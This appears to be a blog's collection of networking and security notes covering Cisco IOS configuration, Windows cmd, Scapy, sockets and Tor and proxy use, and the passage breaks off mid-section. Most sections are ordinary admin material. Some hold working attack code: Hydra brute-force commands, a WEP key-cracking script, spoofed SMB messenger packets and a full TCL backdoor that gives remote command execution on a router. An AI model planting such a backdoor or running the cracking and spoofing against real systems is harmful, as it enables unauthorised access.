# Switching between different VLANs

Introduction

The goal is to do switching between VLAN 10 and VLAN 20.
VLAN 10 is on Switch1, VLAN20 is on Switch2, and VLAN30 is on both switches.

Native VLAN

Switch1(config)# vtp mode transparent
Switch1(config)# interface gi0/1
Switch1(config-if)# switchport
Switch1(config-if)# switchport mode trunk
Switch1(config-if)# switchport trunk encapsulation dot1q
Switch1(config-if)# switchport trunk allowed vlan 10,30
Switch1(config-if)# switchport trunk native vlan 10
Switch1(config-if)# no cdp enable
Switch1(config-if)# spanning-tree bpdufilter enable

Switch2(config)# vtp mode transparent
Switch2(config)# interface gi0/1
Switch2(config-if)# switchport
Switch2(config-if)# switchport mode trunk
Switch2(config-if)# switchport trunk encapsulation dot1q
Switch2(config-if)# switchport trunk allowed vlan 20,30
Switch2(config-if)# switchport trunk native vlan 20
Switch1(config-if)# no cdp enable
Switch2(config-if)# spanning-tree bpdufilter enable

VLAN translation (mapping)

Switch1(config)# vtp mode transparent
Switch1(config)# interface gi0/1
Switch1(config-if)# switchport
Switch1(config-if)# switchport mode trunk
Switch1(config-if)# switchport trunk encapsulation dot1q
Switch1(config-if)# switchport trunk allowed vlan 10,30

Switch2(config)# vtp mode transparent
Switch2(config)# interface gi0/1
Switch2(config-if)# switchport
Switch2(config-if)# switchport mode trunk
Switch2(config-if)# switchport trunk encapsulation dot1q
Switch2(config-if)# switchport trunk allowed vlan 20,30
Switch2(config-if)# switchport vlan mapping enable
Switch2(config-if)# switchport vlan mapping 10 20

# EIGRP summary

Basic

Router(config)#router eigrp 65000
Router(config-router)#network 192.168.0.0 0.0.255.255
Router(config)#ip default-network 192.168.1.0
Router(config-router)#passive-interface default
Router(config-router)#no passive-interface Ethernet0

Summarization

Router(config-router)# ! Transmit subprefix information
Router(config-router)#no auto-summary
Router(config-if)# ! Manual summarization
Router(config-if)#ip summary-address eigrp 65000 172.16.0.0 255.255.0.0

Load balancing

Router(config-router)# ! Unequal cost path load balancing
Router(config-router)# ! Metric < 2*best_metric
Router(config-router)#variance 2
Router(config-router)# ! Proportionately to the ratios of the metrics
Router(config-router)#traffic-share balanced

Bandwidth utilization

Router(config-if)#bandwidth 100000
Router(config-if)# ! 25Mbps for EIGRP traffic (default 50%)
Router(config-if)#ip bandwidth-percent eigrp 65000 25

Stub routing

HubRouter(config-router)#eigrp stub
HubRouter(config-router)#neighbor 192.168.1.1 Ethernet 0
SpokeRouter(config-router)#no ip split-horizon 65000
SpokeRouter(config-router)#neighbor 192.168.1.2 Ethernet 0

Timers

Router(config-if)#ip hello-interval eigrp 65000 2
Router(config-if)#ip hold-time eigrp 65000 8 ! ~ 3*hello-interval

Authentication

Router(config-if)#ip authentication mode eigrp 65000 md5
Router(config-if)#ip authentication key-chain eigrp 65000 eigrp_key

Verification

Router#show ip eigrp neighbors
Router#show ip eigrp topology
Router#show ip eigrp traffic
Router#debug ip eigrp packet
Router#debug ip eigrp neighbors
Router#debug ip eigrp summary
Router#debug ip eigrp

# Cisco IOS scheduling with Kron

Introduction

Cisco documentation.

Kron does not allow the execution of commands from global configuration mode, only from privileged EXEC mode.

Oneshot

Router(config)# kron policy-list kpl-reload
Router(config-kron-policy)# cli reload
Router(config-kron-policy)# exit
Router(config)# kron occurrence ko-reload in 1 oneshot
Router(config-kron-occurrence)# policy-list kpl-reload
Router(config-kron-occurrence)# exit
Router# show kron schedule

At time and recurring

Router(config)# kron policy-list kpl-clear_arp
Router(config-kron-policy)# cli send log Clear ARP cache
Router(config-kron-policy)# cli clear arp-cache interface fa0/1
Router(config-kron-policy)# exit
Router(config)# kron occurrence ko-clear_arp-07:00h at 07:00 recurring
Router(config-kron-occurrence)# policy-list kpl-clear_arp
Router(config-kron-occurrence)# exit
Router(config)# kron occurrence ko-clear_arp-15:00h at 15:00 recurring
Router(config-kron-occurrence)# policy-list kpl-clear_arp
Router(config-kron-occurrence)# exit
Router# show kron schedule

# Windows command line

Help

C:\>help dir
C:\>dir /?

Echo

C:\>echo on
C:\>echo off
C:\>echo Test
C:\>echo.
C:\>@help rem

Regular expressions

C:\>dir *.txt
C:\>dir ???.txt

Redirections

C:\>echo x > file01.txt
C:\>pause < file01.txt
C:\>type file02.txt 2> error.txt
C:\>type file03.txt > output_error.txt 2>&1

Filters

C:\>echo x | pause
C:\>dir | more
C:\>dir | sort | more
C:\>findstr "good night" file04.txt

Environment variables

C:\>set | more
C:\>set var1=1
C:\>ser var2=2
C:\>set var
C:\>set var1=
C:\>set var2=
C:\>set path=%path%;dir01
C:\>echo %computername%
C:\>echo %date%
C:\>echo %time%
C:\>echo %errorlevel%
C:\>echo %number_of_processors%
C:\>echo %os%
C:\>echo %path%
C:\>echo %pathext%
C:\>echo %processor_architecture%
C:\>echo %processor_identifier%
C:\>echo %processor_level%
C:\>echo %processor_revision%
C:\>echo %random%

Copy files

C:\>rem Copy files and directories recursively
C:\>xcopy /?

Compare files

C:\>rem Compare
C:\>comp file1 file2
C:\>rem Compare
C:\>fc file1 file2

Adjusting de cmd

C:\>rem Size
C:\>mode 120x120
C:\>rem Color [0xbackground, 0xforeground]
C:\>color 0a
C:\>rem Window title
C:\>title Network info

Directory listing

C:\>tree /a /f C:\

Scripts

C:\>type script.cmd
@echo off
rem script.cmd
cls
echo.
echo Script name: %0
echo First parameter: %1
echo Second parameter: %2
for %%i in (*.txt) do type %%i
C:\>script p1 p2

Escape

C:\>echo a is ^> than b

Flux control

C:\>call script.cmd %1 %2
C:\>cmd /k dir
C:\>start dir
C:\>for %i in (*.txt) do type %i
C:\>for /D /r %i in (*) do @echo dir: %i
C:\>for /R %i in (*.bak) do del %i
C:\>for /L %i in (1,1,10) do @echo %i
C:\>echo "a 1" >> file05.txt
C:\>echo "b 2" >> file05.txt
C:\>echo "c 3" >> file05.txt
C:\>for /F "tokens=1,2" %i in (file05.txt) do @echo t2=%j t1=%i
C:\>for /F "delims=: tokens=1-2 usebackq" %i in (`time /t`) do @echo %i:%j
C:\>type file06.txt
@echo off
goto message2
echo message1
:message2
echo message2
C:\>if not exist file07.txt echo "No file"
C:\>exit /b 0

# TCL scripting for IOS

Introduction

Documentation

Loops

Router#tclsh
Router(tcl)#for {set i 1} {$i<10} {incr i} {
+> for {set j 1} {$j<3} {incr j} {
+>  ping 192.168.$i.$j repeat 1 timeout 1
+> }
+>}

Router(tcl)#foreach address {
+>192.168.0.1
+>192.168.0.10
+>192.168.0.100
+>} {ping $address}

Procedures

Router(tcl)#proc p {text} {
+> puts $text
+>}

Router(tcl)#p "Hello world!"

# Network performance tools

iperf

server# apt-get install iperf
server# iperf -s -p 5001 -f m

client# apt-get install iperf
client# iperf -c 192.168.1.100 -p 5001 -f m -L 5002 -d

nttcp

server# apt-get install nttcp
server# nttcp -i -p 5001

client# apt-get install nttcp
client# nttcp -T -t -p 5001 -v 192.168.1.100 # transmit
client# nttcp -T -r -p 5001 -v 192.168.1.100 # receive

ttcp

server_router#ttcp receive
client_router#ttcp transmit 192.168.1.200

# Scapy

Introduction

Documentation

Execution

# apt-get install python-scapy
# scapy
>>> ### Basic
>>>
>>> ls() # list available packets
>>> ls(IP) # list attributes of an IP packet
>>> lsc() # list of commands
>>> conf # list the configuration
>>> conf.iface = "eth0" # set values in configuration
>>>
>>> ### Sniffing
>>>
>>> # In one terminal
>>> arping("192.168.1.0/24")
>>> # In another terminal
>>> sniff(filter = "arp")
>>> _.display()
>>>
>>> ### Read pcaps
>>>
>>> rdpcap("icmp.pcap")
>>> _.display()
>>> icmp=_
>>> icmp.display()
>>> icmp[0][IP].src

# Sockets in python

Execution

server# cat pyserver 
#!/usr/bin/python

import socket
import sys

HOST = 'localhost'
PORT = 1024

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

server_socket = (HOST, PORT)
server.bind(server_socket)
print 'Starting up on %s port %s' % server_socket

server.listen(5)

while True:
 try:
  connection, client_socket = server.accept()
  print 'Connection from', client_socket

  data = connection.recv(4096)

  if data:
   print 'Received', data
   data = data.strip()
   connection.send('%s\n%s ack\n%s' % ('-'*15, data, '-'*15))

  connection.shutdown(socket.SHUT_RD | socket.SHUT_WR)

 except KeyboardInterrupt, e: # CTRL+C
  print ''
  break

connection.close()
print 'Connection closed'

server.close()

server# ./pyserver

client# cat client 
#!/usr/bin/python

import socket
import sys

HOST = 'localhost'
PORT = 1024

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

server_socket = (HOST, PORT)
client.connect(server_socket)

client.send(sys.argv[1])
data = client.recv(1024)

client.close()

print 'Received:'
print data

client# ./pyclient

# Hydra: network password cracker

Introduction

Hydra
Default password list

Execution

# apt-get install libssh-dev
# wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
# tar xvzf hydra-6.3-src.tar.gz
# cd hydra-6.3-src
# ./configure
# make
# ./hydra -h
# ./hydra -l foo -p bar -f 127.0.0.1 http-get -m /
# ./hydra -l root -P john_password.lst 127.0.0.1 ssh -s 2222
# ./hydra -l root 8:8:a -f 127.0.0.1 mysql

# Cracking wep

Introduction

Wi-Fi Challenge 3a

Execution

# wget http://code.securitytube.net/Challenge-3a
# file Challenge-3a
# scapy
>>> ch3a = rdpcap("Challenge-3a")
>>> ch3a.display()
>>> ch3a[0]
>>> ch3a[1]
>>> exit()
# cat wepcrack
#!/usr/bin/python

import sys
from scapy.all import *
import Crypto.Cipher.ARC4 as ARC4

pcap = rdpcap("Challenge-3a")
wordlist = open('passwd.lst', 'r')

info = pcap[0].info
iv = pcap[1].iv
wepdata = pcap[1].wepdata

for line in wordlist:
 line = line.strip()
 ivkey = iv + line
 arc4 = ARC4.new(ivkey)
 clear = arc4.decrypt(wepdata)
 
 print 'Trying key', line

 if info in clear:
  print '\nFound Key:', line
  wordlist.close()
  sys.exit()

# ./wepcrack

# Hex encoder and decoder

# cat hexcoder.sh 
#!/bin/bash

function decode {
    echo -n "$1" | sed 's/%\(..\)/\1/g' | xxd -p -r
    echo
}

function encode {
    echo -n "$1" | xxd -p | tr -d '\n' | sed 's/\(..\)/%\1/g'
    echo
}

case $1 in
    "-d") decode $2;;
    "-e") encode $2;;
esac
# ./hexcoder.sh -e hacktracking
%68%61%63%6b%74%72%61%63%6b%69%6e%67
# ./hexcoder.sh -d %68%61%63%6b%74%72%61%63%6b%69%6e%67
hacktracking

# Intel microprocessors quickref

Introduction

Microprocessor Quick Reference Guide

Execution

Name            Clock     Year   Transistors    Width   Addressable memory
--------------------------------------------------------------------------
4004            108 KHz   1971     2300          4 b    640 B
8008            200 KHz   1971     3500          8 b     16 KB   
8080              2 MHz   1974     6000          8 b     64 KB
8085              2 MHz   1976     6500          8 b     64 KB
8086            4'7 MHz   1978    29000         16 b      1 MB
80286             6 MHz   1982   134000         32 b     16 MB   
80386            16 MHz   1986   275000         32 b      4 GB
80486            25 MHz   1989     1'2M         32 b      4 GB
Pentium          60 MHz   1993     3'1M         32 b      4 GB
Pentium Pro     150 MHz   1995     5'5M         32 b     64 GB
Pentium II      233 MHz   1997     7'5M         32 b     64 GB
Pentium III     450 MHz   1999      28M         32 b     64 GB
Pentium 4       1'4 GHz   2000      42M         32 b     64 GB
Pentium D       2'8 GHz   2005     230M         32 b     64 GB
Core 2            3 GHz   2006     291M         64 b     64 GB
Core 2 Quad       3 GHz   2007     582M         64 b     64 GB
Core 2 Extreme  3'2 GHz   2008     820M         64 b     64 GB

# Base converter

Execution

# cat bconv 
#!/bin/bash

function char2dec {
 case $1 in
  b) echo "2" ;;
  o) echo "8" ;;
  d) echo "10";;
  x) echo "16";;
  *) echo $1  ;;
 esac
}

n=`echo $1 | tr [:lower:] [:upper:]`
ib=`char2dec $2`
ob=`char2dec $3`

echo "obase=$ob;ibase=$ib;$n" | bc -l | tr [:upper:] [:lower:]
# ./bconv 1001100110111 b x
1337

# ip nat outside

Introduction

The ip nat inside command allows to do source nat.
The ip nat outside command allows to do destination nat.

Execution

R1#show run
interface FastEthernet0/0
 description to_R2-fa0/0
 ip address 192.168.0.1 255.255.255.0
!
ip route 0.0.0.0 0.0.0.0 192.168.0.2

R2#show run
interface FastEthernet0/0
 description to_R1-fa0/0
 ip address 192.168.0.2 255.255.255.0
!
interface FastEthernet0/1
 description to_R3-fa0/1
 ip address 192.168.1.2 255.255.255.0
!
ip route 0.0.0.0 0.0.0.0 192.168.1.3

R3#show run
interface FastEthernet0/1
 description to_R2-fa0/1
 ip address 192.168.1.3 255.255.255.0
!
ip route 0.0.0.0 0.0.0.0 192.168.1.2

R1#ping 8.8.8.8
.....
Success rate is 0 percent (0/5)

R2(config)#int fa0/0
R2(config-if)#ip nat inside
R2(config)#int fa0/1
R2(config-if)#ip nat outside
R2(config)#ip nat inside source static 192.168.0.1 192.168.1.2
R2(config)#ip nat outside source static 192.168.1.3 8.8.8.8

R1#ping 8.8.8.8
!!!!!
Success rate is 100 percent (5/5)

# Plotting dionaea's statistics with gnuplot

Introduction

Dionaea
Gnuplot
SQLite

Execution

# cat sqlite.query
select
 strftime('%Y-%m-%d',c.connection_timestamp,'unixepoch','localtime') as date,
 count(distinct c.connection), count(distinct d.connection)
from connections c
left outer join downloads d
on (c.connection==d.connection)
group by date
order by date asc;
# sqlite3 /opt/dionaea/var/dionaea/logsql.sqlite
sqlite> .output data.txt
sqlite> .read sqlite.query
sqlite> .exit
# cat data.txt
2011-02-10|125|11
2011-02-11|541|9
2011-02-12|1487|6
2011-02-13|207|5
2011-02-14|611|11
2011-02-15|99|10
2011-02-16|131|12
2011-02-17|128|12
# apt-get install gnuplot
# gnuplot
gnuplot> set terminal png size 640,480 nocrop butt font \
> "/usr/share/fonts/truetype/ttf-liberation/LiberationSans-Regular.ttf"
gnuplot> set output "dionaea.png"
gnuplot> set xdata time
gnuplot> set timefmt "%Y-%m-%d"
gnuplot> set format x "%b %d"
gnuplot> set ylabel "attacks"
gnuplot> set y2label "binaries"
gnuplot> set y2tics
gnuplot> set datafile separator "|"
gnuplot> plot "./data.txt" using 1:2 title "attacks" with lines,\
> "./data.txt" using 1:3 title "binaries" with lines axes x1y2
gnuplot> exit
# eog dionaea.png

# Privoxy server together with Tor

Introduction

Privoxy user manual
Tor on Ubuntu

Execution

server# apt-get install privoxy tor
server# netstat -tan | grep -e 8118 -e 9050
server# cat /etc/privoxy/config | grep -v -e ^# -e ^$
server# sed -i 's/listen-address  localhost:8118/listen-address  192.168.0.100:8118/' /etc/privoxy/config
server# sed -i 's/#        forward-socks5   \/               127.0.0.1:9050 ./forward-socks5 \/ 127.0.0.1:9050 ./' /etc/privoxy/config
server# /etc/init.d/privoxy restart

client# export http_proxy='192.168.0.100:8118'
client# env | grep -i proxy
client# wget -q -O - http://ip-addr.es
137.56.163.64 (tory.uvt.nl)

# Highly anonymous proxy from command-line

Introduction

AliveProxy

Execution

server# cat header_check.php
<?php
 $get_headers=apache_request_headers();
 echo $_SERVER['REQUEST_METHOD']." ".
 $_SERVER['REQUEST_URI']." ".
 $_SERVER['SERVER_PROTOCOL']."\n";
 foreach($get_headers as $header=>$value){
  echo "$header: $value\n";
 }
 echo "Your IP address is:  ".$_SERVER['REMOTE_ADDR'];
?>

client# cat get_proxy_list.sh
#!/bin/bash

wget -q -O - http://aliveproxy.com/high-anonymity-proxy-list/ \
| sed -e 's/?i=/\n%/g' -e 's/ target=_/\n/g' | grep ^% \
| sed -e 's/^%//' -e 's/&p=/:/'

client# export http_proxy=''
client# wget -q -U "Mozilla/5.0 (Windows NT 5.1)" -O - \
> http://foo.bar.net/header_check.php
GET /header_check.php HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 5.1)
Accept: */*
Host: foo.bar.net
Connection: Keep-Alive
Your IP address is: x.x.17.53

client# export http_proxy=`./get_proxy_list.sh | head -n 1`
client# env | grep -i proxy
client# wget -q -U "Mozilla/5.0 (Windows NT 5.1)" -O - \
> http://foo.bar.net/header_check.php
GET /header_check.php HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 5.1)
Accept: */*
Host: foo.bar.net
Connection: close
Your IP address is: 202.108.5.35

# Tor from command-line

Introduction

Tor on Ubuntu

Execution

# echo "deb http://deb.torproject.org/torproject.org `lsb_release -cs` main" >> /etc/apt/sources.list
# gpg --keyserver keys.gnupg.net --recv 886DDD89
# gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -
# apt-get update
# apt-get install tor tor-geoipdb
# apt-get install torsocks
# wget -q -O - http://ip-addr.es
x.x.62.13
# usewithtor wget -q -O - http://ip-addr.es
192.251.226.206 ( anonymizer2.blutmagie.de )
# usewithtor ssh foo@bar.net

# C HTTP client

Introduction

HTTP client that does a head request to the server indicated as first argument.
Note: 209.85.146.99 == 0xd1559263 == 3512046179

Code and example

# cat httpclient.c
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>

int main(int argc,char *argv[]){
 struct addrinfo server_hints;
 struct addrinfo *server_result;
 memset(&server_hints,0,sizeof(struct addrinfo));
 server_hints.ai_family=AF_UNSPEC;
 server_hints.ai_socktype=SOCK_STREAM;
 server_hints.ai_protocol=0;
 int sfd,s;
 printf("%s\n",argv[1]);
 s=getaddrinfo(argv[1],"80",&server_hints,&server_result);
 if(s==0){
  sfd=socket(server_result->ai_family,server_result->ai_socktype,server_result->ai_protocol);
  if(sfd>0){
   struct timeval timeout;
   timeout.tv_sec=0;
   timeout.tv_usec=500000;
   setsockopt(sfd,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout));
   setsockopt(sfd,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout));
   if(connect(sfd,server_result->ai_addr,server_result->ai_addrlen)!=-1){
    freeaddrinfo(server_result);
    char msg[20]="HEAD / HTTP/1.0\r\n\r\n\0";
    send(sfd,msg,strlen(msg),0);
    char buffer[4096];
    bzero(buffer,sizeof(buffer));
    recv(sfd,buffer,sizeof(buffer),0);
    close(sfd);
    printf("%s\n",buffer);
   }
  }
 }
 return 0;
}
# gcc -o httpclient httpclient.c
# ./httpclient 3512046179

# Configuración del IOS con snmp

Introducción

Cisco MIB files
SNMP Object Navigator

Obtener información del dispositivo

# cat devinfo.sh
#!/bin/bash

# $1 = Read-only community
# $2 = Cisco device IP address

swalk="snmpwalk -v1 -c "
oid_sysname=".1.3.6.1.2.1.1.5.0"
oid_sysuptime=".1.3.6.1.2.1.1.3.0"
oid_sysdescr=".1.3.6.1.2.1.1.1.0"
oid_syscontact=".1.3.6.1.2.1.1.4.0"
oid_syslocation=".1.3.6.1.2.1.1.6.0"
oid_iosversion=".1.3.6.1.4.1.9.9.25.1.1.1.2.5"
oid_iosfeatures=".1.3.6.1.4.1.9.9.25.1.1.1.2.4"
oid_avgbusy1=".1.3.6.1.4.1.9.2.1.57.0"
oid_avgbusy5=".1.3.6.1.4.1.9.2.1.58.0"
oid_freemem=".1.3.6.1.4.1.9.2.1.8.0"
oid_whyreload=".1.3.6.1.4.1.9.2.1.2.0"

echo "Hostname    = `$swalk $1 $2 $oid_sysname | cut -d' ' -f4`"
echo "Uptime      = `$swalk $1 $2 $oid_sysuptime | cut -d' ' -f5`"
echo "Description = `$swalk $1 $2 $oid_sysdescr | sed 's/^.*STRING: //'`"
echo "Contact     = `$swalk $1 $2 $oid_syscontact | sed 's/^.*STRING: //'`"
echo "Location    = `$swalk $1 $2 $oid_syslocation | sed 's/^.*STRING: //'`"
echo "CPU 1 min   = `$swalk $1 $2 $oid_avgbusy1 | cut -d' ' -f4`"
echo "CPU 5 min   = `$swalk $1 $2 $oid_avgbusy5 | cut -d' ' -f4`"
echo "Free mem    = $[`$swalk $1 $2 $oid_freemem | cut -d' ' -f4`/1048576] MB"
echo "Last reload = `$swalk $1 $2 $oid_whyreload | sed 's/^.*STRING: //'`"
# ./devinfo.sh rosnmpc 192.168.1.1

Subir y bajar la running-config

# cat getsetrun.sh
#!/bin/bash

# $1 = Read-write community
# $2 = Cisco device IP address
# $3 = TFTP server IP address
# $4 = Configuration file name
# $5 = Action (get|set)

sset="snmpset -v2c -c "
oid_protocol=". .666"
oid_source=".1.3.6.1.4.1.9.9.96.1.1.1.1.3.666"
oid_dest=".1.3.6.1.4.1.9.9.96.1.1.1.1.4.666"
oid_server=".1.3.6.1.4.1.9.9.96.1.1.1.1.5.666"
oid_name=".1.3.6.1.4.1.9.9.96.1.1.1.1.6.666"
oid_status=".1.3.6.1.4.1.9.9.96.1.1.1.1.14.666"

if [ "$5" == "get" ]
then
 src=4;dst=1
elif [ "$5" == "set" ]
then
 src=1;dst=4
else
 exit
fi

$sset $1 $2 $oid_protocol i 1
$sset $1 $2 $oid_source i $src
$sset $1 $2 $oid_dest i $dst
$sset $1 $2 $oid_server a $3
$sset $1 $2 $oid_name s $4
$sset $1 $2 $oid_status i 1
(sleep 10 && $sset $1 $2 $oid_status i 6 > /dev/null) &
# ./getsetrun.sh rwsnmpc 192.168.1.1 192.168.1.10 c2950-config get
# ./getsetrun.sh rwsnmpc 192.168.1.1 192.168.1.10 c2950-config set

# Net send anónimo con scapy

Introducción

Scapy

Ejecución

# cat anetsend.py 
#!/usr/bin/env python

import sys
from scapy.all import *

src=sys.argv[1]
dst=sys.argv[2]
ipsrc=sys.argv[3]
ipdst=sys.argv[4]
msg=sys.argv[5]
port=138
ws='workstation'

ether=Ether(dst='ff:ff:ff:ff:ff:ff',src='de:ad:de:ad:de:ad')
ip=IP(src=ipsrc,dst=ipdst,ttl=13)
udp=UDP(sport=port,dport=port)
nbt=NBTDatagram(
 Type=17,Flags=2,SourceIP=ipsrc,SourcePort=port,
 SourceName=src,SUFFIX1=ws,NULL=0,
 DestinationName=dst,SUFFIX2=ws
)

len0=len(src)+1+len(dst)+1
len1=len0+len(msg)+1
len2=len1+19
raw=Raw(load='\xffSMB%\x00\x00\x00\x00\x18\x04\x00\x00\x00'+
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe'+
'\x00\x00\x00\x00\x11\x00\x00'+chr(len1)+'\x00\x02\x00\x00'+
'\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x58'+
'\x00'+chr(len1)+'\x00\x58\x00\x03\x00\x01\x00\x00\x00\x02'+
'\x00'+chr(len2)+'\x00\\MAILSLOT\\MESSNGR\x00\x00'+src+
'\x00'+dst+'\x00'+msg+'\x00')

p=ether/ip/udp/nbt/raw
sendp(p)
# ./anetsend.py morpheo workgroup 0.0.0.0 192.168.1.255 'The matrix has you...'

# No service password-recovery

Introducción

No service password-recovery

Ejecución

Switch(config)#no service password-recovery
c2960(config)#do wr
c2960(config)#do reload
Proceed with reload? [confirm]

...
The password-recovery mechanism is disabled.
Initializing Flash...
...
...done Initializing Flash.
...


The password-recovery mechanism has been triggered, but
is currently disabled.  Access to the boot loader prompt
through the password-recovery mechanism is disallowed at
this point.  However, if you agree to let the system be
reset back to the default system configuration, access
to the boot loader prompt can still be allowed.

Would you like to reset the system back to the default configuration (y/n)?y


The system has been interrupted, and the config file
has been deleted.  The following command will finish
loading the operating system software:

    boot


switch: boot
Loading "flash:c2960-lanbase-mz.122-35.SE5.bin"...
...
Would you like to terminate autoinstall? [yes]:
Would you like to enter the initial configuration dialog? [yes/no]: no
Switch>

# Multicast streaming with VLC

Introduction

rfc2365

Static IGMP

Switch#show run | i ^interface|description
interface FastEthernet0/1
 description to_client_1
interface FastEthernet0/2
 description to_client_2
interface FastEthernet0/3
 description to_video_server
Switch(config)#ip igmp snooping vlan 1 static 239.0.0.1 interface fa0/1
Switch(config)#ip igmp snooping vlan 1 static 239.0.0.1 interface fa0/2
Switch#show ip igmp snooping groups | i 239.0.0.1
1    239.0.0.2    user    Fa0/1, Fa0/2

video_server# cvlc -vvv video.mpg --sout udp://239.0.0.1 --ttl 1

client_1# vlc -vvv udp://@239.0.0.1

client_2# vlc -vvv udp://@239.0.0.1

Dynamic IGMP (1 hop)

Switch#show run | i ^interface|description
interface FastEthernet0/1
 description client_1
interface FastEthernet0/2
 description client_2
interface FastEthernet0/3
 description to_Router

Router#show run | i ^interface|description
interface FastEthernet0/0
 description to_Switch
interface FastEthernet0/1
 description to_video_server
Router(config)#ip multicast-routing
Router(config)#int fa0/0
Router(config-if)#ip pim dense-mode
Router(config)#int fa0/1
Router(config-if)#ip pim dense-mode

video_server# cvlc -vvv video.mpg --sout udp://239.0.0.2 --ttl 2

client_1# vlc -vvv udp://@239.0.0.2

client_2# vlc -vvv udp://@239.0.0.2

Switch#show ip igmp snooping groups | i 239.0.0.2
1    239.0.0.2    igmp    Fa0/1, Fa0/2, Fa0/3

# Embedded event manager (EEM) applet

Crontab fields

* * * * *

minute (0-59)
hour (0-23)
day of month (1-31)
month (1-12)
day of week (0-6) (0==sunday)

*/30 == every 30 minutes|hours
5,10 == at 5 and 10

Reload every 30 minutes

Router(config)# event manager applet Reload
Router(config-applet)# event timer cron name "Reload" cron-entry "*/30 * * * *"
Router(config-applet)# action 1.0 syslog msg "Reloading the router..."
Router(config-applet)# action 2.0 cli command "enable"
Router(config-applet)# action 3.0 cli command "reload"
Router(config-applet)# end

Write "show processes" to disk when SNMP OID is high

Router(config)# event manager applet High_CPU
Router(config-applet)# event snmp oid 1.3.6.1.4.1.9.9.109.1.1.1.1.3.1 get-type exact 
entry-op ge entry-val "95" exit-op lt exit-val "25" poll-interval 2
Router(config-applet)# action 1.0 syslog msg "CPU is higher than 95%"
Router(config-applet)# action 2.0 command "enable"
Router(config-applet)# action 3.0 cli command "show clock |
append flash:high_cpu.log"
Router(config-applet)# action 4.0 cli command "show processes cpu sorted |
append flash:high_cpu.log"
Router(config-applet)# end

Write "show processes" to disk when pattern matches syslog entry

Router(config)# event manager applet High_CPU
Router(config-applet)# event syslog pattern "from FULL to INIT" occurs 1
Router(config-applet)# action 1.0 command "enable"
Router(config-applet)# action 2.0 cli command "show clock |
append flash:ospf_adjacency_loss.log"
Router(config-applet)# action 3.0 cli command "show processes cpu sorted |
append flash:ospf_adjacency_loss.log"
Router(config-applet)# end

# IOS backdoor con TCL

Introducción

IOS backdoor
TCL

Ejecución

Router#tclsh
Router(tcl)#proc backdoor {port} {
+> global shell loop
+> set shell [socket -server bdsh $port]
+> vwait loop
+> close $shell
+>}

Router(tcl)#proc bdsh {socket ip port} {
+> fconfigure $socket -buffering line
+> puts -nonewline $socket "#"
+> flush $socket
+> fileevent $socket readable [list echo $socket]
+>}

Router(tcl)#proc echo {socket} {
+> global loop
+> if {![catch {gets $socket command}] && ![eof $socket]} {
+>  switch -exact -- $command {
+>   :exit { return [close $socket] }
+>   :stop { set loop end; return [close $socket] }
+>   default { execute $socket $command }
+>  }
+> }
+>}

Router(tcl)#proc execute {socket command} {
+> catch {eval "exec $command"} output
+> if {[catch {puts $socket $output}]} {
+>  return [close $socket]
+> } else {
+>  puts -nonewline $socket "#"
+>  flush $socket
+> }
+>}

Router(tcl)#backdoor 1234

remote_host# ncat Router 1234
#show run | i hostname
hostname Router
#

# IOS Server Load Balancing (SLB)

Introducción

SLB

Dispatched mode (mac-rewrite)

r7200(config)#ip slb serverfarm telnet_srvfarm
r7200(config-slb-sfarm)#predictor leastconns
r7200(config-slb-sfarm)#real 192.168.1.1
r7200(config-slb-real)#weight 16
r7200(config-slb-real)#inservice
r7200(config-slb-sfarm)#real 192.168.1.2
r7200(config-slb-real)#inservice
r7200(config-slb-sfarm)#real 192.168.1.3
r7200(config)#ip slb vserver telnet_vserver
r7200(config-slb-vserver)#virtual 192.168.11.254 tcp telnet
r7200(config-slb-vserver)#serverfarm telnet_srvfarm
r7200(config-slb-vserver)#inservice

SRV1#show run | i ^interface|^ ip|^ip route
interface Loopback0
 ip address 192.168.11.254 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.1.1 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254

SRV2#show run | i ^interface|^ ip|^ip route
interface Loopback0
 ip address 192.168.11.254 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.1.2 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254

SRV3#show run | i ^interface|^ ip|^ip route
interface Loopback0
 ip address 192.168.11.254 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.1.3 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254

Directed mode (NAT)

r7200(config)#ip slb serverfarm telnet_srvfarm
r7200(config-slb-sfarm)#predictor leastconns
r7200(config-slb-sfarm)#nat server
r7200(config-slb-sfarm)#real 192.168.1.1
r7200(config-slb-real)#weight 16
r7200(config-slb-real)#inservice
r7200(config-slb-sfarm)#real 192.168.1.2
r7200(config-slb-real)#inservice
r7200(config-slb-sfarm)#real 192.168.1.3
r7200(config)#ip slb vserver telnet_vserver
r7200(config-slb-vserver)#virtual 192.168.11.254 tcp telnet
r7200(config-slb-vserver)#serverfarm telnet_srvfarm
r7200(config-slb-vserver)#inservice

SRV1#show run | i ^interface|^ ip|^ip route
interface FastEthernet0/0
 ip address 192.168.1.1 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254

SRV2#show run | i ^interface|^ ip|^ip route
interface FastEthernet0/0
 ip address 192.168.1.2 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254

SRV3#show run | i ^interface|^ ip|^ip route
interface FastEthernet0/0
 ip address 192.168.1.3 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254

# Filtrando con CBAC y ZFW

Introducción

CBAC
ZFW

CBAC (Context-Based Access Control)

Router#show run | i ^interface|^ description|^ ip
interface FastEthernet0/0
 description outside
 ip address 192.168.1.1 255.255.255.0
interface FastEthernet0/1
 description inside
 ip address 192.168.0.1 255.255.255.0
Router#show hosts | i IP                   
